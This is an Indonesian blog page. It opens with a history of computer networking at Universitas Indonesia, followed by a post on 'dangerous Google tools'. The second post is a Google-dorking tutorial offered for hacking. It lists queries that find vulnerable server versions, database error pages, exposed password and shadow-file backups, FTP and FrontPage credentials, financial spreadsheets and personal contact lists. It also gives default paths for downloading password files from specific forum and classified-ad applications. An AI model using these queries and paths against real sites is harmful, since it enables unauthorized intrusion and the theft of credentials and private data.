Sejarah Internet Indonesia/Jaringan Komputer di Universitas Indonesia

Era 1970an

Indonesia di era 1970an merupakan negara yang baru akan berkembang. Teknologi Informasi baru mulai diperkenalkan di Indonesia, serta didominasi oleh instansi Pemerintah seperti Pertamina dan Pemda DKI. Secara umum, daya beli masyarakat dan swasta nasional masih sangat lemah. Pada saat tersebut, sebuah instalasi komputer dapat berharga jutaan dollar, menempati ruangan yang besar, serta membutuhkan listrik dan pendinginan yang besar. Teknologi komunikasi data pada saat tersebut bekisar antara 50 - 300 baud.

Di lingkungan Universtas Indonesia (UI), Teknologi Informasi dirintis seorang dosen dari Fakultas Kedokteran, yaitu Indro S. Suwandi PhD (m. 1986). Almarhum setelah mendirikan Pusat Ilmu Komputer (PUSILKOM) UI pada tahun 1972 hanya dengan modal semangat dan idealisme. Almarhum, kemudian dikenal sebagai salah satu tokoh terkemuka yang memperkenalkan teknologi ini, baik di kalangan perguruan tinggi maupun industri.

PUSILKOM UI berusaha untuk eksis dengan mengolah ujian masuk UI, memberikan konsultasi, serta kuliah-kuliah. Kemudian terlibat secara mendalam dalam ujian bersama SKALU (Lima Universitas Negeri), serta berbagai kegiatan konsultasi dan layanan teknologi mulai digeluti secara lebih serius. Semula, PUSILKOM UI berkedudukan di sebuah ruangan di Fakultas Kedokteran, namun kemudian memperoleh suatu gedung berlantai 4 di kampus Salemba, yang sampai saat ini masih dipergunakan secara aktif bersama program studi Magister Ilmu Komputer.

Pada awalnya, kegiatan komputasi sepenuhnya diselenggarakan di Pemda DKI dan Pertamina. Setelah menerima bantuan dua buah mesin Punch Card dari Ford Foundation, sebagian kegiatan dipindahkan ke kampus Salemba. Menjelang akhir tahun 1970an, PUSILKOM telah memiliki dua komputer mini Data General (C/300 dan C/150) berbasis sistem operasi AOS.

Pada masa ini pula mulai dikirim 6 staf PUSILKOM UI ke Amerika Serikat untuk studi lanjutan. Ir. Joseph (Jos) F.P. Luhukay (alumni Fakultas Teknik) diantaranya dikirim ke Universitas Illinois di Urbana-Champaign (UIUC). Jos Luhukay pertama mengenal teknologi internet ketika sedang melakukan berada di UIUC.

[sunting] Era 1980an

Pada awal 1980an, PUSILKOM memperoleh sebuah komputer super mini Data General MV/8000 berbasis AOS/VS. Ke-32 terminal serial/current loop dari super mini tersebut menyebar dibeberapa gedung kampus Salemba, sehingga dapat dikatakan merupakan cikal bakal jaringan kampus UI.

Jaringan ethernet UI mulai dibentuk ketika Jos memperoleh gelah Ph.D pada tahun 1982. Seiring dengan kepulangan ke tanah air pada tahun 1983, Jos membawa oleh-oleh seperangkat komputer unix "Dual Systems 83/20" berbasis Motorola 68000, serta server terminal ethernet "NTS" berbasis Intel 80186. Kehadiran kedua perangkat ini menandai dimulainya dua era sekali gus: "Networking" dan "Unix". Pada saat itu, di PUSILKOM UI juga terdapat sejumlah komputer mikro Apple, serta sebuah IBM XT asli (dua box).

Tahun 1984 R.M.Samik Ibrahim lulus dari Fisika ITB dan bekerja di PUSILKOM UI. Universitas Indonesia pertama kali terhubung dengan dunia luar pada tahun 1986, melalui UUCP (Unix-to-Unix-Copy Protocol) dengan hubungan ke Korea (KAIST) dan Seismo (Arlington, USA). PUSILKOM UI kemudian bekerja sama dengan Profesor Kim Nam Cong dari Korea Advanced Institute of Science and Technology (KAIST), dari mana mereka mempelajari communication network. KAIST ketika itu memiliki link dengan Seizmic Research (Seismo), suatu instansi di Arlington-Virginia, AS. (Salah seorang staff Seizmic Research, Rick Adams, kemudian memisahkan diri dan pada tahun 1988 membentuk UUNet Technology atau yang dikenal sebagai UUNet.

Sifat jaringan di UI itu lebih bersifat utility dibantungkan sarana riset; system yang dibentuk lebih bersifat operasional, dan e-mail account pun diberikan pada mereka yang terlibat langsung di Computer Center atau pada mereka yang memiliki hubungan baik dengan computer center tsb. E-mail dipergunakan hanya internal computer center dan kadang juga untuk mengontak kolega yang berada di luar negeri.

Lambatnya upaya mengembangkan jaringan tersebut ditambah lagi dengan fakta bahwa berbagai upaya yang dilakukan untuk bekerja sama dengan pemerintah Indonesia saat itu sering menemui jalan buntu, karena sulitnya mendapatkan persetujuan proposal yang berhubungan dengan upaya pengembangan / development jaringan, dari pemerintah, sementara kemungkinan untuk membuat jaringan sendiri masih terhalang urusan keuangan (mahalnya peralatan teknis yang dibutuhkan untuk men-set-up jaringan).

Pada tahun 1980an ini memang ada beberapa upaya koneksi jaringan seperti Uninet dan AusiaNet, tapi Samik Ibrahim tidak melihat hal tersebut sebagai suatu keberhasilan, karena terbatasnya perkembangan jaringan tersebut. Ia sendiri sejauh itu tidak terlibat langsung dengan hal-hal teknis, karena ia masih berkonsentrasi dengan social science serta manajemen dan administrasi project.

Pada tahun 1986, Josep Luhukay memperoleh bantuan dana dari World Bank / Bank Dunia untuk proyek UNINET. Proyek jaringan internet ini sedianya dimaksudkan untuk menghubungkan universitas-universitas besar di Indonesia, seperti UI sendiri, ITB-Bandung, IPB-Bogor, ITS-Surabaya, UGM-Yogyakarta, dan UnHas-Makassar. Namun universitas-universitas tersebut belum dapat menyediakan infrastruktur yang diperlukan maupun mempertahankan koneksi internet, karena mahalnya biaya yang diperlukan untuk semua itu ditambah tingginya biaya sambungan jarak jauh per-telepon (dial up connections) yang diperlukan untuk terhubung dengan internet. Terlebih lagi, menurut Samik Ibrahim, ada kecenderungan di Indonesia bahwa project-project yang dilakukan kebanyakan tidak memiliki kelanjutan, dalam pengertian, setelah project selesai sesuai rencana yang dituangkan dalam proposal, budget project juga habis, maka tidak ada kelanjutan pendanaan apalagi post-project efforts untuk meneruskan kegiatan hingga bisa mengembangkan hasil project –dalam hal ini, teknologi dan penerapan selanjutnya. Problem discontinuity ini menurut Samik merupakan salah satu problem yang menghambat perkembangan dalam berbagai bidang.

Menurut Samik Ibrahim, hal tersebut antara lain karena berbelit-belitnya birokrasi dan lamanya approval suatu proposal project, sehingga ketika proposal disetujui pun teknologi yang akan dikembangkan sesuai proposal tersebut sudah menjadi ketinggalan jaman, tidak up-to-date.

Kampus UI pindah ke Depok tahun 1988. Ketika itu memang belum ada networking di UI, karena keterbatasan sarana dan infrastruktur.


Era 1990an

Kesulitan tersebut bertambah dengan adanya liberalisasi perbankan oleh pemerintah Indonesia pada tahun 1988 yang membutuhkan banyak SDM. Orang-orang computer center UI kemudian beralih-bidang ke perbankan, termasuk Jos Luhukay – yang sempat menjadi Presdir Bank Lippo. Jos memboyong (hampir) semua orang "lantai 4". Dapat dikatakan, yang tertinggal hanya puing-puing sehingga semua perlu dibangun kembali dari nol.

Read More..
Category:   Leave a Comment
Tools berbahaya dari google

Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua.

dari tutorial ini yang akan didapatkan adalah:

* Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya

* Bagaimana cara mencari informasi tentang vulnerable systems and Web services

* Bagaimana cara mencari publicly available network devices.

Hal pertama dari yang harus di ketahui adalah Google Query Operators

Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contong nya….

site

memfilter berdasarkan domain yang ada

contoh: site:google.com fox —> akan mencari kata fox di situs google.com

intitle

Memfilter dokumen yang memiliki title yang spesifik

contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire

allintitle

Memfilter dokumen untuk mencari intitle intile

contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire

inurl

Memfilter pencarian dengan url yang spesifik

contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox

allinurl

Sama dengan Allintitle (hanya ini url)

filetype, ext

Memfilter pencarian untuk dokumen yang spesifik

contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire

contoh keren: filetype:doc skripsi IT

numrange

Memfilter dokumen berdasarkan range tertentu

contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire

link

Memfilter site site yang memiliki link terhadap site tertentu

contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com

inanchor

Memfilter berdasarkan site description yang ada

contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire

kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:

/ * - + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )

nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……

Web Server

untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:

“Apache/1.3.28 Server at” intitle:index.of

–> Apache 1.3.28

“Apache/2.0 Server at” intitle:index.of

–> Apache 2.0

“Apache/* Server at” intitle:index.of

–> semua versi dari Apache

“Microsoft-IIS/4.0 Server at” intitle:index.of

–> Microsoft Internet Information Services 4.0

“Microsoft-IIS/5.0 Server at” intitle:index.of

–> Microsoft Internet Information Services 5.0

“Microsoft-IIS/6.0 Server at” intitle:index.of

–> Microsoft Internet Information Services 6.0

“Microsoft-IIS/* Server at” intitle:index.of

–> semua versi dari Microsoft Internet Information Services

“Oracle HTTP Server/* Server at” intitle:index.of

–> semua versi dari Oracle HTTP Server

“IBM _ HTTP _ Server/* * Server at” intitle:index.of

–> semua versi dari IBM HTTP Server

“Netscape/* Server at” intitle:index.of

–> semua versi dari Netscape Server

“Red Hat Secure/*” intitle:index.of

–> semua versi dari the Red Hat Secure server

“HP Apache-based Web Server/*” intitle:index.of

–> semua versi dari the HP server

Beberapa Bug pada Skripts dapat ditemukan google:

“Generated by phpSystem”

–> dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points

“This summary was generated by wwwstat”

–> web server statistics, system file structure

“These statistics were produced by getstats”

–>web server statistics, system file structure

“This report was generated by WebLog”

–>web server statistics, system file structure

intext:”Tobias Oetiker” “traffic analysis”

–>system performance statistics as MRTG charts, network configuration

intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)

–>server version, operating system type, child process list,current connections

intitle:”ASP Stats Generator *.*” “

–>ASP Stats

Generator” “2003-2004 weppos”

–>web server activity, lots of visitor information

intitle:”Multimon UPS status page”

–>UPS device performance statistics

intitle:”statistics of” “advanced web statistics”

–>web server statistics, visitor information

intitle:”System Statistics” +”System and Network Information Center

–>system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”

–>web server statistics, visitor information, system file structure

intitle:”Web Server Statistics for ****”

–>web server statistics, visitor information

inurl:”/axs/ax-admin.pl” -script

–>web server statistics, visitor information

inurl:”/cricket/grapher.cgi”

–>MRTG charts of network interface performance

inurl:server-info “Apache Server Information”

–>web server version and configuration, operating system type, system file structure

“Output produced by SysWatch *”

–>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs

Error message queries

Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.

“A syntax error has occurred” filetype:ihtml

–>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”

–>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”

–>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”

–>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml

–>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information

“Invision Power Board Database Error”

–>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code

“Warning: mysql _ query()” “invalid query”

–>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”

–>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information

“#mysql dump” filetype:sql

–>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents

Google queries untuk mencari lokasi passwords

kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google

“http://*:*@www”

site passwords for site, stored as the string

“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”

file backups, berpotensial untuk mengambil user names and passwords

filetype:mdb inurl:”account|users|admin|administrators|passwd|password”

mdb files, berpotensial untuk mengambil password information

intitle:”Index of” pwd.db

pwd.db files, berpotensial untuk mengambil user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of

directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD

WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”

Terdapat Microsoft FrontPage passwords

filetype:sql (”passwd values ****” |”password values ****” | “pass values ****” )

Terdapat SQL code and passwords yang disimpan dalam a database

intitle:index.of trillian.ini

configuration files for the Trillian IM

eggdrop filetype:user

user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password” configuration files for WV Dial

ext:ini eudora.ini configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb

Microsoft Access files, berpotensial untuk mengambil user account information

intext:”powered by Web Wiz Journal”

websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/

“Powered by DUclassified” -site:duware.com

“Powered by DUcalendar” -site:duware.com

“Powered by DUdirectory” -site:duware.com

“Powered by DUclassmate” -site:duware.com

“Powered by DUdownload” -site:duware.com

“Powered by DUpaypal” -site:duware.com

“Powered by DUforum” -site:duware.com

intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com

websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file

– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb

atau http:///duClassified/

intext:”BiTBOARD v2.0? “BiTSHiFTERS Bulletin Board”

website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained

– dengan cara http:///forum/admin/data _ passwd.dat

atau http:///forum/forum.php

Mencari Dokumen khusus ?

filetype:xls inurl:”email.xls” email.xls

files, berpotensial untuk mengambil contact information

“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”

CVs

“not for distribution”

confidential documents containing the confidential clause

buddylist.blt

AIM contacts list

intitle:index.of mystuff.xml

Trillian IM contacts list

filetype:ctt “msn”

MSN contacts list

filetype:QDF

QDF database files for the Quicken financial application

intitle:index.of finances.xls

finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail

“Network Vulnerability Assessment Report”

“Host Vulnerability Summary Report”

filetype:pdf “Assessment Report”

“This file was generated by Nessus”

reports for network security scans, penetration tests etc. On the Net

untuk lebih kreatifnya bisa di coba coba sendiri, okeh

Read More..
Category:   Leave a Comment